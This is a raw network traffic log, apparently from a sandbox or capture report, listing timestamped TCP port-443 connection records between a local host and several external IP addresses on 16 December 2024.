                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.508945942 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.508958101 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.519493103 CET44349830116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.576574087 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.576623917 CET44349830116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.576760054 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.576773882 CET44349830116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.576813936 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.576833010 CET44349830116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.577096939 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.577105999 CET44349830116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.577138901 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.577148914 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.577159882 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.577197075 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.577253103 CET44349830116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.577265978 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.577281952 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.577296972 CET44349830116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.577316046 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.577374935 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.577394962 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.577411890 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.577428102 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.577439070 CET44349830116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.577462912 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.577471972 CET44349830116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.577496052 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.577534914 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.577604055 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.577604055 CET44349830116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.577637911 CET44349830116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.577653885 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.577678919 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.577692986 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.577755928 CET44349830116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.577759981 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.577790022 CET44349830116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.577795029 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.577838898 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.577892065 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.577904940 CET44349830116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.577925920 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.577934980 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.577936888 CET44349830116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.577958107 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.578006983 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.578049898 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.578059912 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.578073978 CET44349830116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.578084946 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.578094006 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.578103065 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.578104973 CET44349830116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.578150034 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.578195095 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.578205109 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.578228951 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.578229904 CET44349830116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.578243971 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.578258991 CET44349830116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.578294992 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.578303099 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.578321934 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.578378916 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.578392982 CET44349830116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.578421116 CET44349830116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.578423023 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.578452110 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.578465939 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.578476906 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.578512907 CET44349830116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.578531027 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.578545094 CET44349830116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.578562021 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.578578949 CET44349830116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.578599930 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.578617096 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.578624964 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.578635931 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.578660011 CET44349830116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.578675032 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.578712940 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.578732967 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.578742981 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.578774929 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.578778028 CET44349830116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.578813076 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.578819990 CET44349830116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.578869104 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.578895092 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.578915119 CET44349830116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.579688072 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.579719067 CET44349830116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.579746008 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.579947948 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.579994917 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.580013037 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.580117941 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.580146074 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.580152035 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.580169916 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.580261946 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.580279112 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.580295086 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.580318928 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.580338001 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.580429077 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.580461979 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.580482960 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.580497026 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.580526114 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.580892086 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.580931902 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.586772919 CET44349830116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.587739944 CET44349830116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.632827997 CET44349830116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.819329977 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.819406986 CET44349830116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.819454908 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.819480896 CET44349830116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.819516897 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.819540024 CET44349830116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.822498083 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.822520971 CET44349830116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.822551966 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.822570086 CET44349830116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.822598934 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.822613001 CET44349830116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.822649002 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.822686911 CET44349830116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.822719097 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.822734118 CET44349830116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.822755098 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.822766066 CET44349830116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.822791100 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.822803974 CET44349830116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.822843075 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.822860003 CET44349830116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.822901964 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.822921991 CET44349830116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.822951078 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.822967052 CET44349830116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.823013067 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.823026896 CET44349830116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:28.063641071 CET49843443192.168.2.820.110.205.119
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:28.063683033 CET4434984320.110.205.119192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:28.063740969 CET49843443192.168.2.820.110.205.119
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:28.064440966 CET49843443192.168.2.820.110.205.119
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:28.064450979 CET4434984320.110.205.119192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:28.409255028 CET44349834116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:28.409348965 CET49834443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:28.409792900 CET49834443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:28.409802914 CET44349834116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:28.411484957 CET49834443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:28.411490917 CET44349834116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:28.775607109 CET49844443192.168.2.823.57.90.146
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:28.775661945 CET4434984423.57.90.146192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:28.776087999 CET49844443192.168.2.823.57.90.146
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:28.776281118 CET49844443192.168.2.823.57.90.146
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:28.776281118 CET49845443192.168.2.823.57.90.146
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:28.776292086 CET4434984423.57.90.146192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:28.776321888 CET4434984523.57.90.146192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:28.776385069 CET49845443192.168.2.823.57.90.146
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:28.776815891 CET49845443192.168.2.823.57.90.146
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:28.776829958 CET4434984523.57.90.146192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:28.783396959 CET49846443192.168.2.8204.79.197.219
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:28.783451080 CET44349846204.79.197.219192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:28.783763885 CET49847443192.168.2.8204.79.197.219
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:28.783787966 CET49846443192.168.2.8204.79.197.219
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:28.783799887 CET44349847204.79.197.219192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:28.783843040 CET49847443192.168.2.8204.79.197.219
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:28.784024954 CET49846443192.168.2.8204.79.197.219
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:28.784039974 CET44349846204.79.197.219192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:28.784138918 CET49847443192.168.2.8204.79.197.219
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:28.784151077 CET44349847204.79.197.219192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:28.798677921 CET4434983718.173.219.84192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:28.798907042 CET49837443192.168.2.818.173.219.84
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:28.798932076 CET4434983718.173.219.84192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:28.799247980 CET4434983718.173.219.84192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:28.799530983 CET49837443192.168.2.818.173.219.84
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:28.799580097 CET4434983718.173.219.84192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:28.799784899 CET49837443192.168.2.818.173.219.84
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:28.833576918 CET4434983520.42.73.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:28.833810091 CET49835443192.168.2.820.42.73.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:28.833874941 CET4434983520.42.73.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:28.834754944 CET4434983520.42.73.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:28.834835052 CET49835443192.168.2.820.42.73.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:28.835977077 CET49835443192.168.2.820.42.73.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:28.836044073 CET4434983520.42.73.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:28.836148024 CET49835443192.168.2.820.42.73.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:28.836173058 CET4434983520.42.73.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:28.836215019 CET49835443192.168.2.820.42.73.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:28.836246967 CET4434983520.42.73.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:28.847330093 CET4434983718.173.219.84192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:28.891546965 CET49835443192.168.2.820.42.73.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:29.258198023 CET4434983718.173.219.84192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:29.258272886 CET4434983718.173.219.84192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:29.258339882 CET49837443192.168.2.818.173.219.84
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:29.264694929 CET49837443192.168.2.818.173.219.84
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:29.264727116 CET4434983718.173.219.84192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:29.294246912 CET4434983520.42.73.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:29.294331074 CET4434983520.42.73.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:29.294390917 CET49835443192.168.2.820.42.73.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:29.294893026 CET49835443192.168.2.820.42.73.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:29.294939041 CET4434983520.42.73.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:29.298362970 CET44349834116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:29.298382998 CET44349834116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:29.298438072 CET44349834116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:29.298444033 CET49834443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:29.298471928 CET49834443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:29.298567057 CET49834443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:29.298767090 CET49834443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:29.298783064 CET44349834116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:29.301743984 CET49848443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:29.301780939 CET44349848116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:29.302036047 CET49848443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:29.302231073 CET49848443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:29.302242041 CET44349848116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:29.622358084 CET4434984320.110.205.119192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:29.623112917 CET49843443192.168.2.820.110.205.119
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:29.623138905 CET4434984320.110.205.119192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:29.623533010 CET4434984320.110.205.119192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:29.624016047 CET49843443192.168.2.820.110.205.119
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:29.624070883 CET4434984320.110.205.119192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:29.624917030 CET49843443192.168.2.820.110.205.119
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:29.667341948 CET4434984320.110.205.119192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:29.987965107 CET4434984423.57.90.146192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:29.988137007 CET4434984523.57.90.146192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:29.997826099 CET49845443192.168.2.823.57.90.146
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:29.997839928 CET4434984523.57.90.146192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:29.998605967 CET49844443192.168.2.823.57.90.146
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:29.998624086 CET4434984423.57.90.146192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:29.998979092 CET4434984523.57.90.146192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:29.999295950 CET49845443192.168.2.823.57.90.146
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:29.999742985 CET4434984423.57.90.146192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:30.000375032 CET49844443192.168.2.823.57.90.146
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:30.000528097 CET49845443192.168.2.823.57.90.146
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:30.000596046 CET4434984523.57.90.146192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:30.002332926 CET49844443192.168.2.823.57.90.146
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:30.002398968 CET4434984423.57.90.146192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:30.048540115 CET49844443192.168.2.823.57.90.146
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:30.048556089 CET4434984423.57.90.146192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:30.048583984 CET49845443192.168.2.823.57.90.146
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:30.048593044 CET4434984523.57.90.146192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:30.072017908 CET4434984320.110.205.119192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:30.072143078 CET4434984320.110.205.119192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:30.072698116 CET49843443192.168.2.820.110.205.119
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:30.076247931 CET49843443192.168.2.820.110.205.119
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:30.076270103 CET4434984320.110.205.119192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:30.095438957 CET49844443192.168.2.823.57.90.146
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:30.095439911 CET49845443192.168.2.823.57.90.146
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:30.331634045 CET44349846204.79.197.219192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:30.332393885 CET44349847204.79.197.219192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:30.369544983 CET49847443192.168.2.8204.79.197.219
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:30.369575024 CET44349847204.79.197.219192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:30.370171070 CET49846443192.168.2.8204.79.197.219
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:30.370203972 CET44349846204.79.197.219192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:30.370703936 CET44349847204.79.197.219192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:30.370835066 CET49847443192.168.2.8204.79.197.219
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:30.371383905 CET44349846204.79.197.219192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:30.371565104 CET49846443192.168.2.8204.79.197.219
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:30.372718096 CET49847443192.168.2.8204.79.197.219
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:30.372778893 CET44349847204.79.197.219192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:30.377247095 CET49846443192.168.2.8204.79.197.219
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:30.377377033 CET44349846204.79.197.219192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:30.427135944 CET49847443192.168.2.8204.79.197.219
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:30.427144051 CET49846443192.168.2.8204.79.197.219
